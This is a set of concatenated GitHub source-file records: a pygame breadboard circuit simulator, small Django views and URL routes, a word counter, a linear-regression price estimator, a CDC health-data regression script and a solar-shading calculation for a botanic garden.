ic_discrim.rep, ic_discrim.column + i, ic_discrim.row, ic_discrim.name)\n else:\n f_x = i + (ic_dips - 1) - (2 * i)\n discriminator = (ic_discrim.segment, ic_discrim.rep, ic_discrim.column + f_x, ic_discrim.row, ic_discrim.name)\n pins_to_nodes[i] = self.main_board_rects[discriminator][1]\n return pins_to_nodes\n\n # Check if an IC will collide with other elements on a breadboard given the coordinate\n def ic_collision(self, ic_discrim, ic_dips):\n requirements = [i.uuid for i in self.ic_requirements(ic_discrim, ic_dips).values()]\n for plugin in self.plugins.values():\n if isinstance(plugin, IntegratedCircuit):\n for node in plugin.pins_to_nodes.values():\n if node.uuid in requirements:\n return True\n return False\n\n # Check if an IC is allowed to sit on a row of breadboard points given the coordinate\n def ic_allowed(self, ic, point_hovered):\n discriminator = point_hovered.discriminator\n if discriminator.segment == 0:\n rows = self.main_board_config.per_column_rows\n if discriminator.row == (rows - 1):\n columns = self.main_board_config.per_segment_columns\n if discriminator.column + (ic.dip_count / 2) <= columns:\n col = self.ic_collision(discriminator, ic.dip_count)\n return not col\n return False\n\n # Convert from a position to a coordinate and scale\n def point_to_coord(self, real_pos, point, scale):\n for rect_group in [self.main_board_rects, self.pr_rects]:\n for coord in rect_group:\n p = rect_group[coord][2]\n if p == 
point:\n r = rect_group[coord][0].copy()\n real_r_pos = tuple(map(sum, zip(real_pos, (r.centerx * scale[0], r.centery * scale[1]))))\n return real_r_pos\n return 0, 0\n\n # Return a surface that only contains the LED bulb heads\n def surface_led(self):\n surface = self.plain_surface.copy()\n surface.set_colorkey((0, 0, 0))\n for plugin in self.plugins:\n plugin_obj = self.plugins[plugin]\n if isinstance(plugin_obj, LED):\n plugin_rect = plugin.rect\n plugin_surf = plugin_obj.surface(self)[0]\n plugin_size = plugin_surf.get_width(), plugin_surf.get_height()\n plugin_pos = (plugin_rect.centerx - plugin_size[0] / 2, plugin_rect.centery - plugin_size[1] / 2)\n surface.blit(plugin_surf, plugin_pos)\n return surface\n\n # Return a surface that contains all plugin parts on the part texture\n def surface(self, real_pos, scale):\n\n rect_hovered = None\n\n # Prepare the surface\n self.texture.blit(self.drawing_surface, (0, 0))\n surface = self.texture\n\n # Draw plugins\n incomplete_wire = any(isinstance(x, BreadboardPoint) or isinstance(x, PluginPart) for x in self.env.query_disable)\n for plugin in self.plugins:\n\n # Prepare plugin surface\n plugin_obj = self.plugins[plugin]\n plugin_rect = plugin.rect\n plugin_surf = plugin_obj.surface(self)[0]\n plugin_size = plugin_surf.get_width(), plugin_surf.get_height()\n\n # Snap plugin to center if it is an Integrated Circuit\n if isinstance(plugin_obj, IntegratedCircuit):\n plugin_pos = (plugin_rect.left, plugin_rect.centery)\n else:\n plugin_pos = (plugin_rect.centerx - plugin_size[0]/2, plugin_rect.centery - plugin_size[1]/2)\n\n # Draw plugin\n surface.blit(plugin_surf, plugin_pos)\n\n # Check if the plugin is hovered with the mouse\n if not len(self.env.query_disable) or self.env.query_disable == [plugin_rect]:\n scaled_topleft = tuple(map(lambda i, j, k: (i*j)+k, plugin_pos, scale, real_pos))\n plugin_surf_rect = plugin_surf.get_rect(topleft=scaled_topleft)\n plugin_surf_rect.w *= scale[0]\n plugin_surf_rect.h *= scale[1]\n if plugin_surf_rect.collidepoint(pygame.mouse.get_pos()):\n if plugin_rect not in self.env.query_disable:\n self.env.query_disable.append(plugin_rect)\n pygame.draw.rect(surface, COL_SELECTED, plugin_surf.get_rect(topleft=plugin_pos), width=math.floor(2 / scale[0]))\n if pygame.mouse.get_pressed()[0]:\n if incomplete_wire is False:\n plugin_obj.deletion_key = self, plugin\n self.env.selected = plugin_obj\n else:\n if plugin_rect in self.env.query_disable:\n self.env.query_disable.remove(plugin_rect)\n\n # If there is a volatile switch that is not pressed, make sure it is off\n if not pygame.mouse.get_pressed()[0]:\n if isinstance(plugin_obj, Switch):\n if not plugin_obj.latch:\n plugin_obj.state = 0\n\n # Draw an outline if the plugin is selected\n if self.env.selected == plugin_obj:\n pygame.draw.rect(surface, COL_SELECTED, plugin_surf.get_rect(topleft=plugin_pos), width=math.floor(4 / scale[0]))\n\n # Check if the breadboard is hovered\n if not len(self.env.query_disable) or incomplete_wire:\n\n surface_rect = self.texture.get_rect().copy()\n surface_rect.w *= scale[0]\n surface_rect.h *= scale[1]\n surface_rect.topleft = real_pos\n\n # Find a hovered point\n for rect_group in [self.main_board_rects, self.pr_rects]:\n for coord in rect_group:\n pygame.draw.circle(surface, COL_BREADBOARD_HOLE, rect_group[coord][0].center, self.radius)\n if surface_rect.collidepoint(pygame.mouse.get_pos()):\n r = rect_group[coord][0].copy()\n real_r_pos = tuple(map(sum, zip(real_pos, (r.x * scale[0], r.y * scale[1]))))\n r.w *= scale[0]\n r.h 
*= scale[1]\n r.topleft = real_r_pos\n if r.collidepoint(pygame.mouse.get_pos()):\n rect_hovered = rect_group[coord][2]\n pygame.draw.rect(surface, COL_BLACK, rect_group[coord][0])\n\n # Draw an outline around breadboard if hovered\n if surface_rect.collidepoint(pygame.mouse.get_pos()):\n pygame.draw.rect(surface, COL_SELECTED, self.texture.get_rect(), width=2)\n if pygame.mouse.get_pressed()[0] and rect_hovered is None and not incomplete_wire:\n self.env.selected = self\n\n # Draw an outline around breadboard if selected\n if self.env.selected == self:\n pygame.draw.rect(surface, COL_SELECTED, self.texture.get_rect(), width=4)\n\n return surface, rect_hovered\n\n\nclass BreadboardPoint:\n \"\"\"A structure denoting an individual point on a breadboard, which may be common to a rail\"\"\"\n\n def __init__(self, parent, discriminator, common, rect):\n self.parent = parent\n self.discriminator = discriminator\n self.common = common\n self.rect = rect\n\n\nclass BreadboardRail(Node):\n \"\"\"A structure denoting a set of points on a breadboard that are electrically connected\"\"\"\n\n def __init__(self, rail_discriminator):\n super().__init__()\n self.rail_discriminator = rail_discriminator\n\n\nclass PluginPart(Part):\n \"\"\"A type of part which must be plugged into a breadboard\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, env):\n super().__init__(name, desc, texture, preview_texture, env)\n self.deletion_key = None\n\n def surface(self, hovered_board):\n pass\n\n\nclass LED(PluginPart):\n \"\"\"The LED is a structure containing details about where the positive and negative terminals are connected, the\n colour of the light, if the light is functioning and its state\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, on_colour, off_colour, env, anode_point=None, cathode_point=None):\n super().__init__(name, desc, texture, preview_texture, env)\n self.state = 0\n self.on_colour = on_colour\n self.off_colour = off_colour\n self.cathode_connecting = False\n self.anode_point = anode_point\n self.cathode_point = cathode_point\n self.alive = True\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.on_colour, self.off_colour, self.anode_point, self.cathode_point\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state[:-2], pygame.env, anode_point=state[-2], cathode_point=state[-1])\n\n # Draw the LED\n def surface(self, hovered_board):\n\n inch_tenth = hovered_board.inch_tenth\n\n # Prepare the surface\n surface = pygame.Surface((inch_tenth*2, inch_tenth*2))\n surface.set_colorkey((0, 0, 0))\n\n # Draw the bulb\n pygame.draw.circle(surface, self.off_colour, surface.get_rect().center, inch_tenth)\n\n # If it is dead, draw an X on it\n if not self.alive:\n pygame.draw.line(surface, COL_FAKE_BLACK, (0, 0), (inch_tenth*2, inch_tenth*2), width=10)\n pygame.draw.line(surface, COL_FAKE_BLACK, (inch_tenth*2, 0), (0, inch_tenth*2), width=10)\n\n # Otherwise if it is on, draw the light\n elif self.state:\n pygame.draw.circle(surface, self.on_colour, surface.get_rect().center, math.floor(3*(inch_tenth/4)))\n\n return surface, None\n\n\nclass IntegratedCircuit(PluginPart):\n \"\"\"The integrated circuit is a structure containing the number of points it occupies, the related subcircuit\n raw SPICE data and any relevant documentation.\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, 
dip_count, raw_spice, spice_nodes, datasheet_img, env, pin_map=None):\n super().__init__(name, desc, texture, preview_texture, env)\n path = env.get_main_path()\n self.dip_count = dip_count\n self.raw_spice = raw_spice\n self.spice_nodes = spice_nodes\n self.datasheet_file = datasheet_img\n self.datasheet_image = pygame.image.load(os.path.join(path, 'assets', 'textures', 'datasheets', datasheet_img))\n self.pins_to_nodes = {} if pin_map is None else pin_map\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.dip_count, self.raw_spice, self.spice_nodes, self.datasheet_file, self.pins_to_nodes\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n self.__init__(*state[:-1], pygame.env, pin_map=state[-1])\n\n # Return a surface containing the integrated circuit and its labels\n def draw(self, inch_tenth, radius, gap):\n\n # Prepare the surface and text handlers\n win = pygame.Surface(((self.dip_count/2)*inch_tenth, gap+inch_tenth))\n handler = TextHandler(self.env, 'Play-Regular.ttf', radius*4)\n pin_handler = TextHandler(self.env, 'Play-Regular.ttf', math.floor(radius*1.5))\n\n # Render the label\n label = handler.render(self.name)\n win.set_colorkey((0, 0, 0))\n\n # Draw the DIP chassis\n rect = pygame.Rect(0, radius, win.get_width(), win.get_height()-(2*radius))\n pygame.draw.rect(win, COL_IC_LID, rect)\n\n # For each pin, draw a smaller rectangle corresponding to the breadboard point\n # Also draw a label showing the purpose of the pin\n for i in range(self.dip_count):\n if i < self.dip_count/2:\n r = pygame.Rect((inch_tenth/2) - (radius/2) + (inch_tenth*i), win.get_height()-radius, radius, radius)\n pygame.draw.rect(win, COL_IC_PIN, r)\n r_label = pin_handler.render(self.spice_nodes[i])\n win.blit(r_label, (r.centerx - (r_label.get_width()/2), r.y - r_label.get_height()))\n else:\n r = pygame.Rect((win.get_width() - (inch_tenth / 2)) - (radius/2) - (inch_tenth * (i-(self.dip_count/2))), 0, radius, radius)\n pygame.draw.rect(win, COL_IC_PIN, r)\n r_label = pin_handler.render(self.spice_nodes[i])\n win.blit(r_label, (r.centerx - (r_label.get_width()/2), r.bottom))\n\n # Draw the label\n win.blit(label, (win.get_width()/2 - label.get_width()/2, win.get_height()/2 - label.get_height()/2))\n\n return win\n\n # Return a surface containing the integrated circuit and its labels\n def surface(self, hovered_board):\n main_board_config = hovered_board.main_board_config\n inch_tenth, radius = hovered_board.inch_tenth, hovered_board.radius\n gap = main_board_config.segment_gap - (main_board_config.per_column_rows*inch_tenth)\n surface = self.draw(inch_tenth, radius, gap)\n return surface, None\n\n\nclass Switch(IntegratedCircuit):\n \"\"\"The switch structure contains the type of switch and acts as an integrated circuit so that it uses the\n same rules when connecting to a breadboard\"\"\"\n\n def __init__(self, name, desc, texture, preview_texture, dip_count, raw_spice, spice_nodes, latch, datasheet_img, env, pin_map=None):\n super().__init__(name, desc, texture, preview_texture, dip_count, raw_spice, spice_nodes, datasheet_img, env, pin_map=pin_map)\n self.state = 0\n self.latch = latch\n self.raw_spice = \"\"\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return self.name, self.desc, self.texture_name, self.preview_texture_name, self.dip_count, self.raw_spice, \\\n self.spice_nodes, self.latch, self.datasheet_file, 
self.pins_to_nodes\n\n    def __setstate__(self, state):\n        \"\"\"Restore state from the unpickled state values.\"\"\"\n        self.__init__(*state[:-1], pygame.env, pin_map=state[-1])\n\n    # Return a surface containing the switch\n    def draw(self, inch_tenth, radius, gap):\n\n        # Prepare the surface\n        win = pygame.Surface(((self.dip_count/2)*inch_tenth, gap+inch_tenth))\n        win.set_colorkey((0, 0, 0))\n\n        # Draw the switch body\n        rect = pygame.Rect(0, radius, win.get_width(), win.get_height()-(2*radius))\n        pygame.draw.rect(win, COL_SWITCH, rect)\n\n        # Draw the switch shaft\n        switch_shaft = pygame.Rect(rect.centerx - rect.w*3/8, rect.centery - rect.h*1/5, rect.w*3/4, rect.h*2/5)\n        pygame.draw.rect(win, COL_SWITCH_SHAFT, switch_shaft)\n\n        # Draw the switch\n        switch = pygame.Rect((rect.centerx - rect.w*3/8) + (self.state*rect.w*3/8), rect.centery - rect.h*1/5, rect.w*3/8, rect.h*2/5)\n        pygame.draw.rect(win, (1, 1, 1), switch)\n\n        # Draw the switch indicator\n        pygame.draw.circle(win, COL_WHITE, switch.center, switch.w/4)\n\n        # Draw the pins without labels\n        for i in range(self.dip_count):\n            if i < self.dip_count/2:\n                r = pygame.Rect((inch_tenth/2) - (radius/2) + (inch_tenth*i), win.get_height()-radius, radius, radius)\n                pygame.draw.rect(win, COL_IC_PIN, r)\n            else:\n                r = pygame.Rect((win.get_width() - (inch_tenth / 2)) - (radius/2) - (inch_tenth * (i-(self.dip_count/2))), 0, radius, radius)\n                pygame.draw.rect(win, COL_IC_PIN, r)\n\n        return win\n","repo_name":"devkapa/devolt","sub_path":"logic/parts.py","file_name":"parts.py","file_ext":"py","file_size_in_byte":33718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"15772842342","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import OverFunds, TransType, Trans, SourceMoney, Users\nfrom django.db.models import F, Sum\n\n\ndef HomePageView(request):\n    sources = SourceMoney.objects.all()\n    total = SourceMoney.objects.aggregate(Sum('sum'))\n\n    return render(request, 'buh/index.html', {\n        'sources': sources,\n        'total': total.get('sum__sum')\n    })\n\ndef AddTransaction(request):\n    sources = Trans.objects.all()\n\n    return render(request, 'buh/add_trans.html', {\n        'sources': sources\n\n    })\n","repo_name":"bolt41/gitBolt","sub_path":"FamilyMoney/buh/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72803725159","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Dec 23 00:00:16 2018\n\n@author: laureano\n\"\"\"\n\ndef wc(filename):\n    \"\"\"Return (line count, word count, character count) for a text file.\"\"\"\n    with open(filename, 'r') as f:\n        text = f.read()\n    # split() collapses runs of whitespace when counting words;\n    # len(text) counts every character, newlines included\n    return (len(text.splitlines()), len(text.split()), len(text))\n\n#print(wc('shakespeare.txt'))\n","repo_name":"laureansvictor/FPRO","sub_path":"re12/wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36727113648","text":"\"\"\"\nURL configuration for seminar project.\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/4.2/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. 
Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom .views import index, head_tails, cubes, hundred, about, headtails_values, rolls, game_roll\n\n\nurlpatterns = [\n path('', index, name='index'),\n path('headtails', head_tails, name='head_tails'),\n path('headtails_values', headtails_values, name='headtails_values'),\n path('cubes', cubes, name='cubes'),\n path('hundred/', hundred, name='hundred'),\n path('about/', about, name='about'),\n path('rolls/', rolls, name='rolls'),\n path('/', game_roll, name='game_roll'),\n]","repo_name":"olgabikbulatova/flaskhw2","sub_path":"Django/seminar/gameapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70192297962","text":"from train import read_file\n\n\ndef predict(th0, th1, x):\n return th0 + (x * th1)\n\n\ndef validate_estimator(content):\n for line in content:\n if line.startswith(\"#\") or line == '\\n':\n continue\n try:\n th0 = float(line.split(',')[0])\n th1 = float(line.split(',')[1])\n except Exception:\n print('Wrong format of \\'train_result.csv\\'')\n exit()\n return th0, th1\n\n\ndef main():\n content = read_file(\"train_result.csv\")\n th0, th1 = validate_estimator(content)\n mileage = float(input(\"\\nPlease enter mileage: \"))\n try:\n price = predict(th0, th1, mileage)\n except OverflowError:\n print('The number is too big')\n exit()\n print('Estimated price: {0}'.format(price))\n \n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"etuffleb/linear_regression","sub_path":"estimator.py","file_name":"estimator.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"70725577959","text":"# math_utils.py\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport plotly.express as px\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport io\nimport base64\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom plotly.subplots import make_subplots\nimport plotly.graph_objs as go\n\n# Placeholder for the trained model\ntrained_model = None\n\ndef df():\n excel = pd.ExcelFile(\"cdc.xlsx\")\n\n sheet_names = excel.sheet_names\n dataframes = []\n\n for sheet_name in sheet_names:\n df = excel.parse(sheet_name)\n dataframes.append(df)\n\n df_d, df_o, df_i = dataframes[0], dataframes[1], dataframes[2]\n\n df_d.drop(columns=[\"YEAR\", \"COUNTY\", \"STATEW\"], inplace=True)\n merge_df_do = pd.merge(df_d, df_o, on='FIPS', how='inner')\n merge_df_do.drop(columns=[\"YEAR\", \"COUNTY\", \"STATE\"], inplace=True)\n\n de_new_f = df_i.rename(columns={'FIPDS': 'FIPS'})\n\n merge_df_all = pd.merge(merge_df_do, de_new_f, on='FIPS', how='inner')\n merge_df_all.drop(columns=[\"YEAR\", \"COUNTY\", \"STATE\"], inplace=True)\n return merge_df_all, merge_df_all.columns.tolist()\n\ndef getinfo(merge_df_all):\n columns = merge_df_all.columns.tolist()\n matplotlib.use('agg')\n plt.ioff()\n\n # Pair plot\n pairplot_img = io.BytesIO()\n sns.pairplot(merge_df_all.iloc[:, 
-3:])\n plt.savefig(pairplot_img, format='png')\n plt.close()\n pairplot_img_base64 = base64.b64encode(pairplot_img.getvalue()).decode('utf-8')\n matplotlib.use(matplotlib.get_backend())\n\n # Histograms\n hist_plots_img = io.BytesIO()\n fig, ax = plt.subplots(1, len(columns), figsize=(15, 5))\n\n for i in range(len(columns)):\n sns.histplot(merge_df_all[columns[i]], ax=ax[i], kde=True)\n\n plt.tight_layout()\n plt.savefig(hist_plots_img, format='png')\n plt.close()\n\n hist_plots_img_base64 = base64.b64encode(hist_plots_img.getvalue()).decode('utf-8')\n\n # Skewness\n skewness_table_img = io.BytesIO()\n skewness = merge_df_all.iloc[:, -3:].skew()\n skewness_df = skewness.to_frame().reset_index() \n\n # Convert skewness table to HTML and write to BytesIO\n skewness_table_img.write(skewness_df.to_html(index=False, justify='center', classes='table table-bordered table-condensed table-striped').encode('utf-8'))\n skewness_table_img.seek(0)\n skewness_table_html = skewness_table_img.read().decode('utf-8') # Convert BytesIO to string\n\n # Correlation Matrix\n correlation_matrix_table_img = io.BytesIO()\n correlation_matrix = merge_df_all.iloc[:, -3:].corr()\n\n # Convert correlation matrix table to HTML and write to BytesIO\n correlation_matrix_table_img.write(correlation_matrix.to_html(index=True, justify='center', classes='table table-bordered table-condensed table-striped').encode('utf-8'))\n correlation_matrix_table_img.seek(0)\n correlation_matrix_table_img_base64 = base64.b64encode(correlation_matrix_table_img.read()).decode('utf-8')\n\n # Heat map\n corr_matrix_heatmap_img = io.BytesIO()\n axis_corr = sns.heatmap(correlation_matrix, vmin=-1, vmax=1, center=0, annot=True, annot_kws={'size': 12})\n cbar = axis_corr.collections[0].colorbar\n cbar.ax.tick_params(labelsize=12)\n plt.savefig(corr_matrix_heatmap_img, format='png')\n plt.close()\n corr_matrix_heatmap_img_base64 = base64.b64encode(corr_matrix_heatmap_img.getvalue()).decode('utf-8')\n\n return {\n 'pairplot_img_base64': pairplot_img_base64,\n 'hist_plots_img_base64': hist_plots_img_base64,\n 'skewness_table_html': skewness_table_html,\n 'corr_matrix_heatmap_img_base64': corr_matrix_heatmap_img_base64,\n 'data_table': skewness_df.to_html(index=False, justify='center', classes='table table-bordered table-condensed table-striped'),\n 'correlation_matrix_table': correlation_matrix.to_html(index=True, justify='center', classes='table table-bordered table-condensed table-striped'),\n 'summary_stats': merge_df_all.describe().to_html(classes='table table-bordered table-condensed table-striped')\n }\n\n\ndef model():\n merge_df_all, columns = df()\n\n X = merge_df_all[['% OBESE', '% INACTIVE']]\n y = merge_df_all[['% DIABETIC']] \n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42) \n\n model = LinearRegression()\n model.fit(X_train, y_train) \n\n y_predict = model.predict(X_test) \n\n scatter_plot_data = {\n 'x': X_test['% OBESE'].tolist(),\n 'y': X_test['% INACTIVE'].tolist(),\n 'z': y_test['% DIABETIC'].tolist(),\n }\n\n return {\n 'model': model,\n 'scatter_plot_data': scatter_plot_data,\n }\n\n\ndef plot_scatter_3d(model, merge_df_all, z_data):\n X_test = merge_df_all[['% OBESE', '% INACTIVE']]\n \n # Predict the values using the trained model\n y_predict = model.predict(X_test)\n\n # Create 3D scatter plot\n trace_actual = go.Scatter3d(\n x=X_test['% OBESE'],\n y=X_test['% INACTIVE'],\n z=z_data,\n mode='markers',\n marker=dict(size=5, color='blue'),\n name='Actual Data'\n )\n\n trace_predict 
= go.Scatter3d(\n x=X_test['% OBESE'],\n y=X_test['% INACTIVE'],\n z=y_predict,\n mode='markers',\n marker=dict(size=5, color='red'),\n name='Predicted Values'\n )\n\n fig = make_subplots(rows=1, cols=1, specs=[[{'type': 'scatter3d'}]])\n fig.add_trace(trace_actual)\n fig.add_trace(trace_predict)\n\n fig.update_layout(\n scene=dict(\n xaxis=dict(title='% OBESE'),\n yaxis=dict(title='% INACTIVE'),\n zaxis=dict(title='% DIABETIC'),\n ),\n title='Scatter Plot with Multilinear Regression',\n showlegend=True,\n )\n\n # Convert the plot to base64 string\n model_plot_img_base64 = fig.to_image(format='png')\n model_plot_img_base64 = base64.b64encode(model_plot_img_base64).decode('utf-8')\n\n return model_plot_img_base64\n\ndef predict(model, obese, inactive):\n # Placeholder for prediction logic\n # You should use the provided model to make predictions based on the input features\n # Replace the following line with the actual prediction code\n predicted_diabetic = model.predict([[obese, inactive]])[0]\n print(predicted_diabetic)\n return predicted_diabetic\n\n\n# # Load the model during the startup\n# trained_model_results = model()\n# trained_model = trained_model_results['model']\n\n# # Print the predicted value for the initial values (12, 34)\n# initial_obese = 12\n# initial_inactive = 34\n# predicted_diabetic_initial = predict_diabetic(trained_model, initial_obese, initial_inactive)\n# print(f\"Predicted diabetic value for (12, 34): {predicted_diabetic_initial}\")\n\n\n# Uncomment the following lines to test the functions\n# df()\n# getinfo()\n# model()\n# predict()\n\ntrained_model_results = model()\ntrained_model = trained_model_results['model']\npredicted_diabetic = predict(trained_model, 12, 34)","repo_name":"nikhil9066/flaskwork","sub_path":"math_utils.py","file_name":"math_utils.py","file_ext":"py","file_size_in_byte":7007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11693936165","text":"############################################################################\n# Project: Forest Dynamics at the 'Woods of the World'\n# Title: Calculation of the fractional light recieved by each stand\n# Author: James Gilmore\n# Email: james.gilmore@pgr.reading.ac.uk.\n# Version: 1.0.0\n# Date: 22/12/15\n# Status: Alpha\n############################################################################\n\n#Initialising the python script\nfrom __future__ import absolute_import, division, print_function\nfrom scipy.integrate import quad, dblquad\nfrom array import array\nimport numpy as np\nimport warnings\n\n#Define the equitorial coordinate system\nzenith = lambda H, dec, lat: np.arcsin(np.sin(lat)*np.sin(dec)+np.cos(lat)*np.cos(dec)*np.cos(H))\nazimuth = lambda lat, dec, zenith: np.arccos((np.sin(dec)-np.sin(zenith)*np.sin(lat))/(np.cos(zenith)*np.cos(lat)))\ndec = lambda Jday: np.arcsin(np.sin(np.radians(-23.44))*np.cos((np.radians(360)/365.24)*(Jday+10)+(np.radians(360)/np.pi)*0.0167*np.sin((np.radians(360)/365.24)*(Jday-2))))\nhe = lambda Jday: 0.17*np.sin((4*np.pi*(Jday-80))/373)-0.129*np.sin((2*np.pi*(Jday-8))/355)\ngam = lambda h: -15*np.floor(h)\nH = lambda hl, gaml, gam, he: (np.pi/12)*(hl-(24*(gaml-gam)/360)+he-12)\ntd = lambda Jday: (2*np.pi*(np.floor(Jday)-1))/365\n\n#Define the equations specific to the NBGW\nSolElvNBGW = lambda h, day: zenith(H(h, np.radians(-4.15176), gam(0), he(day)), np.radians(dec(day)), np.radians(51.83756))*57.2957795\n\n#### Be careful: Put hours in double format (i.e. 
3am is 3.0 NOT 3)\nSolAziNBGW = lambda h, day: np.piecewise(h, [h < 12.01854275271367, h >= 12.01854275271366], [lambda h: azimuth(np.radians(51.83756), np.radians(dec(day)), np.radians(SolElvNBGW(h,day)))*57.2957795, lambda h: 360-azimuth(np.radians(51.83756), np.radians(dec(day)), np.radians(SolElvNBGW(h,day)))*57.2957795])\n\n#Dawn and Dusk\nDawn = lambda day: 11.9952 - 3.81972*np.arccos(1.27249*np.tan(0.0174533*np.arcsin(0.397789*np.cos(0.172029 + 0.0172029*day + 0.0334*np.sin(0.0172029*(-2. + day)))))) - 0.17*np.sin(0.03369*(-80. + day)) + 0.129*np.sin(0.0176991*(-8. + day))\nDusk = lambda day: 11.9952 + 3.81972*np.arccos(1.27249*np.tan(0.0174533*np.arcsin(0.397789*np.cos(0.172029 + 0.0172029*day + 0.0334*np.sin(0.0172029*(-2. + day)))))) - 0.17*np.sin(0.03369*(-80. + day)) + 0.129*np.sin(0.0176991*(-8. + day))\n\n#Import the data of the tree set in the correct columnar form:\nX, Y, HE, CH, CW = np.genfromtxt(\"GillyShadingTIFull.csv\", dtype=float, delimiter=',', usecols=(0, 1, 2, 3, 4), unpack=True, skip_header=1)\n\n############################################################################\n#The Gilly Light Equation\n\n#The Gilly Shade Criterion Function (GSCF)\n\nRM = lambda x: np.array([[np.cos(x), -np.sin(x)], [np.sin(x), np.cos(x)]])\n\n#Example shadow projection for midday on day 173 (result is not used anywhere):\n#[X, Y]+np.dot(RM(np.radians(-(SolAziNBGW(12,173)-210)))/np.tan(SolElvNBGW(12,173)),[-CW/200,HE])\n\n\ndef KMatrixFun(N=0, O=0, h=12, day=173, ntrees=len(X)):\n\t# crown, height and combined shade masks must be separate arrays;\n\t# sharing one buffer would let each assignment overwrite the others\n\tKMatrixCrown = np.zeros([ntrees, 2])\n\tKMatrixHeight = np.zeros([ntrees, 2])\n\tKMatrix = np.zeros([ntrees, 2])\n\t\n\tfor i in range(ntrees):\n\t\tKMatrixCrown[i] = ([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[-CW[i]/200,HE[i]])-[N, O])/([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[-CW[i]/200,HE[i]-CH[i]])-[N, O])\n\t\tfor j in range(2):\n\t\t\tif KMatrixCrown[i, j] <= 0:\n\t\t\t\tKMatrixCrown[i, j] = 0\n\t\t\telse:\n\t\t\t\tKMatrixCrown[i, j] = 1\n\t\n\t\tKMatrixHeight[i] = ([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[0,HE[i]])-[N, O])/([X[i], Y[i]]+np.dot(RM(np.radians(-(SolAziNBGW(h,day)-210)))/np.tan(SolElvNBGW(h,day)),[0,HE[i]-CH[i]])-[N, O])\n\t\tfor j in range(2):\n\t\t\tif KMatrixHeight[i, j] <= 0:\n\t\t\t\tKMatrixHeight[i, j] = 0\n\t\t\telse:\n\t\t\t\tKMatrixHeight[i, j] = 1\n\t\t\t\n\t\tKMatrix[i] = KMatrixHeight[i]+KMatrixCrown[i]\n\t\n\treturn KMatrix\n\t\ndef ZetaUnitGrid(h=12, day=173, nmin=0, nmax=60, omin=0, omax=60, spacings=1):\n\trows = int((nmax-nmin)/spacings)\n\tcols = int((omax-omin)/spacings)\n\t# the working mask and the returned unit grid must also be separate arrays\n\tKMatrixTot = np.zeros([rows, cols])\n\tKMatrixTotTot = np.zeros([rows, cols])\n\t\n\twith warnings.catch_warnings():\n\t\twarnings.simplefilter(\"ignore\")\n\t\tfxn()\n\t\tfor i in range(nmin,nmax,spacings):\n\t\t\tfor j in range(omin,omax,spacings):\n\t\t\t\tKM = KMatrixFun(i, j, h, day)\n\t\t\t\tKMatrixTot[i,j] = KM[i,0]+KM[i,1]\n\t\t\n\t\t\t\t# threshold with a separate index so the outer loop variable is not clobbered\n\t\t\t\tfor k in range(rows):\n\t\t\t\t\tif KMatrixTot[k,j] <= 0:\n\t\t\t\t\t\tKMatrixTot[k,j] = 0\n\t\t\t\t\telse:\n\t\t\t\t\t\tKMatrixTot[k,j] = 1\n\t\n\t\t\t\tif (rows - KMatrixTot.sum()) <= 0:\n\t\t\t\t\tKMatrixTotTot[i,j] = 1\n\t\t\t\telse:\n\t\t\t\t\tKMatrixTotTot[i,j] = 0\n\t\t\t\t\n\treturn KMatrixTotTot\n\n\ndef GillyLightEquation():\n\tGillyTop = 0.0\n\tfor day in range(0,365):\n\t\thmax = (Dusk(day)-Dawn(day))/10\n\t\tfor h in range(int(hmax)):\n\t\t\t# step through the daylight hours starting at dawn\n\t\t\tGillyTop += ZetaUnitGrid(Dawn(day)+h*hmax,day,0,1,0,1,1)\n\treturn GillyTop\n\t\ndef fxn():\n    warnings.warn(\"deprecated\", 